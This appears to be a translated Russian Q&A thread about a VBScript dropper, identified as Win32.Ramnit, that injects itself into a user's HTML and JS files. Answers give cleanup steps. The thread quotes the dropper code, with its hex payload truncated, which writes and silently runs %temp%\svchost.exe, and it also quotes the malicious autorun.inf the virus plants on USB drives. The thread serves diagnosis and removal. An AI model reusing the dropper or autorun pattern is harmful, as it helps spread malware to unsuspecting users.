Как этот фрагмент кода VB добавляется автоматически?
Всякий раз, когда я открываю файлы JavaScript (.js) или HTML (.html) через несколько дней в Notepad++, аналогичный VB-скрипт автоматически добавляется в конце. Я сильно чувствую, что это какой-то вирус, кто-нибудь может мне помочь?
</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- .... {Lots of junk characters here } -->
4 ответа
Файл, который он запускает, является%temp%\svchost.exe.
Поэтому составьте список задач
tasklist /svc /fi "imagename eq svchost.exe"
запишите svchosts без каких-либо содержащих сервисов. Введите фактический PID для хххх
taskkill /pid xxxx /pid xxxx /pid xxxx /f
Это остановит эту конкретную часть работы.
Техника, используемая вирусом, не будет надежно работать, особенно на неанглийских окнах.
Также вместо того, чтобы удалить его, измените безопасность, чтобы предотвратить выполнение, пока вы не очистите другие части, которые могут существовать.
icacls "%temp%\svchost.exe" /deny Everyone:F
Это для Vista, но широко применимо ко всем версиям.
Очистка от вирусов
Если у вас есть проблемы с этим в обычном режиме. Попробуйте сделать это в безопасном режиме с поддержкой сети.
Нажмите Пуск - Все программы - Стандартные - Запустите и введите
msconfig
Затем перейдите на вкладку Boot и нажмите Safe Boot, а также отметьте Network. Перезагружать. Вернитесь сюда и снимите флажок Безопасная загрузка, чтобы вернуться в обычный режим.
Сканер безопасности
Сканер безопасности Microsoft - это бесплатное загружаемое средство безопасности, которое обеспечивает сканирование по требованию и помогает удалять вирусы, шпионское ПО и другое вредоносное ПО. Он работает с вашим существующим антивирусным программным обеспечением.
http://www.microsoft.com/security/scanner/en-au/default.aspx
Средство удаления вредоносных программ
Если вы не можете загрузить или запустить сканер безопасности, в Windows встроена небольшая антивирусная программа. Она предназначена только для наиболее распространенных угроз. Это будет хотеть обновить, не позволяйте этому. Запустите его без обновления. Затем запустите его снова, обновив на этот раз.
Нажмите Пуск - Все программы - Стандартные - Выполнить (или нажмите Winkey + R). Тип
mrt
Сбросить брандмауэр
Вы можете сбросить настройки вашего брандмауэра по умолчанию.
Пуск - Все программы - Стандартные - Щелкните правой кнопкой мыши Командная строка и выберите Запуск от имени администратора. Введите (или скопируйте и вставьте, щелкнув правой кнопкой мыши в окне командной строки и выбрав Вставить).
netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"
Исправления безопасности
Исправления - это программы устранения неполадок от Microsoft. Их 27
Автоматическое исправление настроек безопасности Windows для обеспечения безопасности вашего ПК
http://support.microsoft.com/mats/Malware_Prevention/en-us
а также
Исправьте проблемы безопасности, чтобы автоматически защитить и обезопасить Windows
http://support.microsoft.com/mats/windows_security_diagnostic/en-us
а также
Исправьте проблемы Internet Explorer, чтобы сделать IE быстрым, безопасным и стабильным
http://support.microsoft.com/mats/ie_performance_and_safety/en-us
Для ознакомления с полным списком
http://support.microsoft.com/fixit/en-us
Когда вы решите скачать его, выберите опцию для запуска на другом компьютере. Затем вы можете сохранить его на жестком диске в папке. Откройте папку, откройте папку Fix it Portable и запустите Launch Fix It. Он будет содержать все 27 исправлений.
Полный рабочий день антивирус
Для постоянного антивируса мы здесь на форумах замечаем полное отсутствие проблем для людей, использующих Microsoft Security Essentials.
http://www.microsoft.com/en-au/download/details.aspx?id=5201
Если все остальное терпит неудачу
Эта программа от Microsoft загружает другую базовую операционную систему для очистки Windows. Вы должны положить его на USB или DVD, а затем загрузить с него.
http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline
Посмотрите подробности об угрозе
Microsoft ведет энциклопедию вирусной информации.
http://www.microsoft.com/security/portal/threat/threats.aspx
Я также думаю, что ваша система затронула некоторые вирусы. Я хочу поделиться ссылкой, с которой я столкнулся, которая соответствует вашему вопросу, пожалуйста, пройдите здесь, здесь я опубликую ссылку -> http://www.webdeveloper.com/forum/showthread.php?287131-VBScript-gets-inserted-automatically-in-HTML-page
Я думаю, что это вирус.
Итак, вам нужно установить антивирусное программное обеспечение, если у вас его нет.
Я рекомендую бесплатно: Microsoft Security Essentials или Avast.
Также вы можете скачать специальную антивирусную утилиту только для сканирования, а не для ее установки - Dr. Web CureIt!
Затем сделайте полное сканирование вашего компьютера.
Вы должны проверить все команды запуска и удалить все вредоносные. например, CCleaner Free может помочь вам проверить их.
UPD После очистки и удаления команд запуска вы можете использовать sfc полезность.
Microsoft Windows Resource Checker
Проверяет целостность всех защищенных системных файлов и заменяет неправильные версии правильными версиями Microsoft.
Бежать cmd с правами администратора, а затем запустить sfc /scannow команда.
Это вирус Win32.Ramnit читайте описание здесь:
Я только что обнаружил этот вирус на одном из компьютеров моего клиента, и этот вирус изменил все мои html-файлы на моем жестком диске USB Portable.
Этот скрипт выполняет сценарий VBScript, чтобы создать файл, выполнить его и установить программу в эту папку:
C:\Program Files\Microsoft\DesktopLayer.exe
читать дальше: http://greatis.com/blog/how-to-remove-malware/desktoplayer-exe-virus-ramnit.htm
и для каждого USB-накопителя, который вы вставили в этот зараженный компьютер, вирус создаст 2 файла:
autorun.inf
\RECYCLER\<random GUID>\<random charx8>.exe
Содержание autorun.inf:
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
shell\explore\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
USEAUTOPLAY=1
shell\Open\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
Какая попытка запустить инсталлятор вируса, когда этот pendrive вставлен в другой компьютер.